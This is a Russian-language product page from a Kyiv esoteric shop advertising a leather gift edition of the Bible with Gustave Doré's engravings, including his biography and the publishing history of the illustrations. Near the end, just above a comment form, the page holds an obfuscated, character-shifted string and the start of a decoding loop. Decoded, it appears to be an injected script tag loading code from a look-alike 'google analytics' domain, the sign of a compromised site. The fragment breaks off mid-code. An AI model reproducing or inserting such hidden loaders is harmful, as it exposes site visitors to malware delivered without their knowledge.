Библия в гравюрах Гюстава Доре (подарочное издание)ISBN: 978-5-902617-46-4
Переплет: Кожаный переплет, ручная работа, тиснение золотой и черной фольгой, ошкуренный и окрашенный обрез.
Год издания: 2008 год
Издатель: “Издательство Антона Жигульского”
Цена : см. прайс-лист

Магический магазин “Мистическая Гирлянда” представляет Вам книгу ”Библия в гравюрах Гюстава Доре (подарочное издание)”

Библия – это божественное творение, которая в самой себе содержит доказательства своего Божественного происхождения.
Французкий художник Гюстав Доре (1832-1883) на протяжении своей жизни создал сотни изысканых иллюстраций к сюжетам библейских рассказов. Его иллюстрации использовались в различных изданиях Библии на разных языках в Европе ХІХ века, а позже в странах Северной и Южной Америки. Иллюстрированые сюжеты на библейскую тематику создавались многими мастерами изобразительного искусства, но среди них Доре был одним из самых выдающихся.
Благодаря реализму своего стиля Доре дал вторую жизнь этим рассказам, описывающим реальные события. На протяжении многих веков фрески, мозаики и рельефные изображения на камнях с их точной иконописю и ореолами над определёнными предметами, несли в себе некую карикатурность в воссприятии многими верующими. Однако, в иллюстрациях Доре библейские герои и места событий выглядят правдоподобно и неподдельно. Современники Гюстава Доре критиковали его творчество и сомневались в его компетентности, как художника. Тем не менее его иллюстрации выдержали испытание временем и до сих пор ярко отображают важные библейские события.

Гюстав Доре родился во Франции, в Страсбурге в 1832 году, а умер в Париже в 1883-м. За свою жизнь он добился очень большого успеха и стал одним из самых известных иллюстраторов XIX века. После него осталось более десяти тысяч иллюстраций более чем к 90 книгам, сотни картин маслом и акварелей, много скульптур. Но истинную славу Доре принесли его всемирно известные иллюстрации к классическим произведениям мировой литературы. В течение 1850-1860-х годов Доре оформил ряд величайших произведений мировой литературы, в том числе "Божественную комедию" Данте, "Потерянный Рай" Мильтона, "Дон Кихота" Сервантеса, "Бурю" Шекспира, "Басни" Лафонтена. Иллюстрировал он и детскую классическую литературу, в том числе арабские сказки и сказки Шарля Перро.
В 1865 году французский издательский дом Alfred Mame et fils выпустил Библию с роскошными иллюстрациями Доре. Права на английское издание этой книги были приобретены лондонским издательством Cassel, Petter and Galpin, и с 1866 по 1870 год Библия с иллюстрациями Гюстава Доре начала выходить частями одновременно в Лондоне и Нью-Йорке. Вскоре Библия с иллюстрациями Доре вышла и на некоторых других языках. Многие считают, что иллюстрации к Библии - это лучшее, что создал Доре.
В данное издание включено 184 иллюстрации на библейские сюжеты и краткие комментарии к каждой из них.

Стильно оформленное подарочное издание в кожаном переплете ручной работы, инкрустированном металлической пластиной с гравировкой и украшенном рельефным тиснением; с трехсторонним золотым обрезом и шелковым ляссе.


Приобрести данную книгу Вы можете посетив наш эзотерический магазин по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>